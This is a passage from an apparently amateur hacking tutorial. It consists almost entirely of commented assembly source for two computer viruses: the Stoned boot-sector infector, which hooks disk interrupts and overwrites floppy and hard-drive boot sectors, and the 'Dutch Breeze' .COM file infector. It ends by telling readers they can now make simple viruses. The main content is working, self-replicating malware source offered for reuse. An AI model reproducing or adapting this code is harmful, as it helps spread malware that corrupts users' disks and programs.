end of the code XOR CX,CX MOV DX,CX ;Side 0, drive A INC CX ;Track 0, sector 1 PUSHF CALL DWORD PTR CS:OLD_13 ;Do the old INT 13 JNB RD_OK ;Disk read was OK XOR AX,AX PUSHF CALL DWORD PTR CS:OLD_13 ;Reset disk DEC SI ;Bump the counter JNZ RDLOOP ;Loop to try reading disk sector JMP SHORT QUIT ;Close up and return if all 4 tries failed NOP ;****************************************************************************** ; Here if disk read was OK. We got the boot sector. But is it already infected? ; Find out by comparing the first 4 bytes of the boot sector to the first 4 ; bytes of this code. If they don't match exactly, infect the diskette. ;****************************************************************************** RD_OK: XOR SI,SI MOV DI,200H CLD PUSH CS POP DS LODSW CMP AX,[DI] JNZ HIDEIT ;Hide floppy boot sector in directory LODSW CMP AX,[DI+2] JZ QUIT ;Close up and return ;************************************************************ ; Infect - Hide floppy boot sector in directory ;************************************************************ HIDEIT: MOV AX,301H ;Write 1 sector MOV BX,200H ;From the space at the end of this code MOV CL,3 ;To sector 3 MOV DH,1 ;Side 1 PUSHF CALL DWORD PTR CS:OLD_13 ;Do the old INT 14 JB QUIT ;Close up and return if failed ;****************************************************************** ; If write was sucessful, write this code to the boot sector area ;****************************************************************** MOV AX,301H ;Write 1 sector ... XOR BX,BX ;...of this very code... MOV CL,1 ;...to sector 1... XOR DX,DX ;...of Side 0, drive A PUSHF CALL DWORD PTR CS:OLD_13 ;Do an old INT 13 ; ***NOTE*** no test has been done for a sucessful write. ;*************************************************************** ; Close up and return ;*************************************************************** QUIT: POP DI POP SI POP ES POP DX POP CX POP BX RET INFECT ENDP ;**************************************************************** ;*** Jump here at boot up time ;**************************************************************** ;***************************************************************************** ; Redefine the variable offsets. The code here executes in the memory area ; used by the normal boot sector. The variable offsets have an assembled ; value of the order 7Cxx. Access them here through the DS: segment override ;***************************************************************************** D_TYPE = 07C00h + OFFSET _D_TYPE O_13_O = 07C00h + OFFSET _O_13_O O_13_S = 07C00h + OFFSET _O_13_S J_AD_O = 07C00h + OFFSET _J_AD_O J_AD_S = 07C00h + OFFSET _J_AD_S BT_ADD = 07C00h + OFFSET _BT_ADD JPBOOT: XOR AX,AX MOV DS,AX ;DS = 0 ;********************************************************* ; Set up a usable stack ;********************************************************* CLI MOV SS,AX ;SS = 0 MOV SP,OFFSET 7C00H ;Position stack at 0000:7C00 STI ;********************************************************* ; Capture the INT 13 vector (BIOS disk I/O) ;********************************************************* MOV AX,DS:4CH ;Offset for old INT 13 vector MOV DS:O_13_O,AX ;Save the offset MOV AX,DS:4EH ;Segment for old INT 13 vector MOV DS:O_13_S,AX ;Save the segment ;***************************************************************************** ; Decrease the memory available to DOS by 2K. Only 1K really seems needed, but ; stealing an odd number of K would result in an odd number shown available ; when a CHKDSK is run. This might be too obvious. Or the programmer may have ; had other plans for the memory. ;***************************************************************************** MOV AX,DS:413H ;BIOS' internal count of available memory DEC AX DEC AX ;Drop it by 2K ... MOV DS:413H,AX ;...and store it (steal it!!) ;********************************************************* ; Find the segment of the stolen memory ;********************************************************* MOV CL,6 SHL AX,CL MOV ES,AX ;********************************************************* ; Use the segment of the stolen memory area ;********************************************************* MOV DS:J_AD_S,AX ;Becomes part of a JMP address MOV AX,OFFSET NEW_13 MOV DS:4CH,AX ;Offset for new INT 13 MOV DS:4EH,ES ;Segment for new INT 13 ;**************************************************************** ;Copy the code from 07C0:0000 to ES:0000 (the stolen memory area) ;**************************************************************** MOV CX,OFFSET END_BYT ;The size of the code (# of bytes to move) PUSH CS POP DS ;DS = CS XOR SI,SI MOV DI,SI ;All offsets of block move areas are 0 CLD REPZ MOVSB ;Copy each byte of code to the top of memory JMP DWORD PTR CS:JMP_ADR ;JMP to the transferred code... ;************************************************************** ; ...and we'll jump right here, to the transferred code ;************************************************************** ;**************************************************************************** ; Redefine variable offsets again. This code executes at the top of memory, ; and so the exact value of the segment registers depends on how much memory ; is installed. The variable offsets have an assembled value of the order of ; 00xx. They are accessed using the CS: segment override ;**************************************************************************** D_TYPE = OFFSET _D_TYPE O_13_O = OFFSET _O_13_O O_13_S = OFFSET _O_13_S J_AD_O = OFFSET _J_AD_O J_AD_S = OFFSET _J_AD_S BT_ADD = OFFSET _BT_ADD HI_JMP: MOV AX,0 INT 13H ;Reset disk system ;********************************************************************** ; This will read one sector into 0000:7C00 (the boot sector address) ;********************************************************************** XOR AX,AX MOV ES,AX MOV AX,201H ;Read one sector MOV BX,OFFSET 7C00H ;To boot sector area: 0000:7C00 CMP BYTE PTR CS:D_TYPE,0 ;Booting from diskette or hard drive? JZ DISKET ;If booting from a diskette ;****************************************************** ; Booting from a hard drive ;****************************************************** MOV CX,7 ;Track 0, sector 7 MOV DX,80H ;Hard drive, side 0 INT 13H ;Go get it ; ***NOTE** There was no check as to wether or not the read was sucessful JMP SHORT BOOTUP ;Go run the real boot sector we've installed NOP ;****************************************************** ; Booting from a diskette ;****************************************************** DISKET: MOV CX,3 ;Track 0, sector 3 MOV DX,100H ;A drive, side 1 (last sector of the directory) INT 13H ;Go get it JB BOOTUP ;If read error, run it anyway.(???) (A prank?) ;**************************************************************** ;Wether or not we print the "Stoned" message depends on the value ; of a byte in the internal clock time -- a fairly random event. ;**************************************************************** TEST BYTE PTR ES:46CH,7 ;Test a bit in the clock time JNZ GETHDB ;Get Hard drive boot sector ;************************************************************** ; Print the message ;************************************************************** MOV SI,OFFSET S_MSG ;Address of the "stoned message" PUSH CS POP DS ;************************************************************** ; Loop to print individual characters ;************************************************************** PRINT1: LODSB OR AL,AL ;A 00 byte means quit the loop JZ GETHDB ;Get Hard drive boot sector, then ;************************************************************** ; Not done looping. Print another character ;************************************************************** MOV AH,0EH MOV BH,0 INT 10H JMP SHORT PRINT1 ;Print a character on screen ;************************************************************** ; Get Hard drive boot sector ;************************************************************** GETHDB: PUSH CS POP ES MOV AX,201H ;Read one sector... MOV BX,200H ;...to the buffer following this code... MOV CL,1 ;...from sector 1... MOV DX,80H ;...side 0, of the hard drive INT 13H JB BOOTUP ;If error, assume no hard drive ; So go run the floppy boot sector ;*************************************************************************** ; If no read error, then there really must be a hard drive. Infect it. The ; following code uses the same trick above where the first 4 bytes of the ; boot sector are compared to the first 4 bytes of this code. If they don't ; match exactly, then this hard drive isn't infected. ;*************************************************************************** PUSH CS POP DS MOV SI,200H MOV DI,0 LODSW CMP AX,[DI] JNZ HIDEHD ;Hide real boot sector in hard drive LODSW CMP AX,[DI+2] JNZ HIDEHD ;Hide real boot sector in hard drive ;************************************************************** ; Go run the real boot sector ;************************************************************** BOOTUP: MOV BYTE PTR CS:D_TYPE,0 JMP DWORD PTR CS:BT_ADD ;************************************************************** ; Infect - Hide real boot sector in hard drive ;************************************************************** HIDEHD: MOV BYTE PTR CS:D_TYPE,2 ;Mark this as a hard drive infection MOV AX,301H ;Write i sector... MOV BX,200H ;...from the buffer following this code... MOV CX,7 ;...to track 0, sector 7... MOV DX,80H ;...side 0, of the hard drive... INT 13H ;Do it JB BOOTUP ;Go run the real boot sector if failed ;************************************************** ; Here if the boot sector got written successfully ;*************************************************** PUSH CS POP DS PUSH CS POP ES MOV SI,3BEH ;Offset of disk partition table in the buffer MOV DI,1BEH ;Copy it to the same offset in this code MOV CX,242H ;Strange. Only need to move 42H bytes. This ; won't hurt, and will overwrite the copy of ; the boot sector, maybe giving a bit more ; concealment. REPZ MOVSB ;Move them MOV AX,301H ;Write 1 sector... XOR BX,BX ;...of this code... INC CL ;...into sector 1 INT 13H ; ***NOTE*** no check for a sucessful write JMP BOOTUP ;Now run the real boot sector S_MSG DB 7,'Your PC is now Stoned!',7,CR,LF DB LF ;************************************************************************* ; Just garbage. In one version, this contained an extension of the above ; string, saying "LEGALIZE MARIJUANA". Some portions of this text remain ;************************************************************************* DB 0,4CH,45H,47H,41H DB 4CH,49H,53H,45H,67H DB 2,4,68H,2,68H DB 2,0BH,5,67H,2 END_BYT EQU $ ;Used to determine the size of the code. It ; must be less than 1BE, or this code is too ; large to be used to infect hard disks. From ; offset 1BE and above, the hard disk partition ; table will be copied, and anything placed ; there will get clobbered. CODE ENDS END The following is Non-Resident .COM infector which will also infect COMMAND.COM .MODEL TINY Public VirLen,MovLen Code Segment para 'Code' Assume Cs:Code,Ds:Code,Es:Code Org 100h Signature Equ 0CaDah ; Signature of virus is ABCD! Buff1 Equ 0F100h Buff2 Equ Buff1+2 VirLen Equ Offset Einde-Offset Begin MovLen Equ Offset Einde-Offset Mover DTA Equ 0F000h Proggie Equ DTA+1Eh Lenny Equ DTA+1Ah MinLen Equ Virlen ;Minimale lengte te besmetten programma MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; This part will contain the actual virus code, for searching the ; next victim and infection of it. ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Begin: Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk DW Signature ; Herkenningsteken virus Oversig: Pushf ;------------------ Push AX ; Alle registers opslaan voor Push BX ; later gebruik van het programma Push CX ; Push DX ; Push DS ; Push ES ; Push SS ; Push SI ; Push DI ;------------------ InfectPart: Mov AX,Sprong ;------------------ Mov Buf1,AX ; Spronggegevens bewaren om Mov BX,Source ; besmette programma te starten Mov Buf2,BX ;------------------ Mov AH,1Ah ; DTA area instellen op Mov DX,DTA ; $DTA area Int 21h ;------------------ Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory Mov Cx,1 ; Lea DX,FindPath ; Int 21h ;------------------ Jnc KijkInfected ; Geen gevonden, goto Afgelopen Jmp Afgelopen ;------------------ KijkInfected: Mov DX,Cs:[Lenny] ;------------------ Cmp DX,MinLen ; Kijken of programmalengte voldoet Jb ZoekNext ; aan de eisen van het virus Cmp DX,MaxLen ; Ja ZoekNext ;------------------ On2: Mov AH,3Dh ; Zo ja , file openen en file handle Mov AL,2 ; opslaan Mov DX,Proggie ; Int 21h ; Mov FH,AX ;------------------ Mov BX,AX ; Mov AH,3Fh ; Lezen 1e 4 bytes van een file met Mov CX,4 ; een mogelijk kenmerk van het virus Mov DX,Buff1 ; Int 21h ;------------------ Sluiten: Mov AH,3Eh ; File weer sluiten Int 21h ;------------------ Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2 Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op Jnz Infect ; morgoth virus. Als bestand al besmet ZoekNext: Mov AH,4Fh ;------------------ Int 21h ; Zoeken naar volgende .COM file Jnc KijkInfected ; Geen gevonden, goto Afgelopen Jmp Afgelopen ;------------------ Db 'Dutch [Breeze] by Glenn Benton' Infect: Mov DX,Proggie ; beveiliging weghalen Mov AH,43h ; Mov AL,1 ; Xor CX,Cx Int 21h ;------------------ Mov AH,3Dh ; Bestand openen Mov AL,2 ; Mov DX,Proggie ; Int 21h ;------------------ Mov FH,AX ; Opslaan op stack van Mov BX,AX ; datum voor later gebruik Mov AH,57H ; Mov AL,0 ; Int 21h ; Push CX ; Push DX ;------------------ Mov AH,3Fh ; Inlezen van eerste deel van het Mov CX,VirLen+2 ; programma om later terug te Mov DX,Buff1 ; kunnen plaatsen. Int 21h ;------------------ Mov AH,42H ; File Pointer weer naar het Mov AL,2 ; einde van het programma Xor CX,CX ; zetten Xor DX,DX ; Int 21h ;------------------ Xor DX,DX ; Bepalen van de variabele sprongen Add AX,100h ; in het virus (move-routine) Mov Sprong,AX ; Add AX,MovLen ; Mov Source,AX ;------------------ Mov AH,40H ; Move routine bewaren aan Mov DX,Offset Mover ; einde van file Mov CX,MovLen ; Int 21h ;------------------ Mov AH,40H ; Eerste deel programma aan- Mov DX,Buff1 ; voegen na Move routine Mov CX,VirLen ; Int 21h ;------------------ Mov AH,42h ; File Pointer weer naar Mov AL,0 ; het begin van file Xor CX,CX ; sturen Xor DX,DX ; Int 21h ;------------------ Mov AH,40h ; En programma overschrijven Mov DX,Offset Begin ; met code van het virus Mov CX,VirLen ; Int 21h ;------------------ Mov AH,57h ; Datum van aangesproken file Mov AL,1 ; weer herstellen Pop DX ; Pop CX ; Int 21h ;------------------ Mov AH,3Eh ; Sluiten file Int 21h ;------------------ Afgelopen: Mov BX,Buf2 ; Sprongvariabelen weer Mov Source,BX ; op normaal zetten voor Mov AX,Buf1 ; de Move routine Mov Sprong,AX ;------------------ Mov AH,1Ah ; DTA adres weer op normaal Mov Dx,80h ; zetten en naar de Move Int 21h ; routine springen Jmp CS:[Sprong] ;------------------ ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; All variables are stored in here, like filehandle, date/time, ; search path and various buffers. ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ FH DW 0 FindPath DB '*.COM',0 Buf1 DW 0 Buf2 DW 0 Sprong DW 0 Source DW 0 ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; This will contain the relocator routine, located at the end of ; the ORIGINAL file. This will tranfer the 1st part of the program ; to it's original place. ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Mover: Mov DI,Offset Begin ;------------------ Mov SI,Source ; Verplaatsen van het 1e deel Mov CX,VirLen-1 ; van het programma, wat achter Rep Movsb ;------------------ Pop DI ; Opgeslagen registers weer Pop SI ; terugzetten op originele Pop SS ; waarde en springen naar Pop ES ; het begin van het programma Pop DS ; (waar nu het virus niet meer Pop DX ; staat) Pop CX ; Pop BX ; Pop AX ; Popf ; Mov BX,100h ; Jmp BX ;------------------ ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Only the end of the virus is stored in here. ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Einde db 0 Code Ends End Begin Well after reading this guide you may be in a position to make simple viruses. Ankit Fadia ankit@bol.net.in To receive tutorials on everything you dreamt of written by Ankit Fadia, join his mailing list by sending an email to: programmingforhackers-subscribe@egroups.com My Tutorials Archive: http://hackingtruths.tripod.com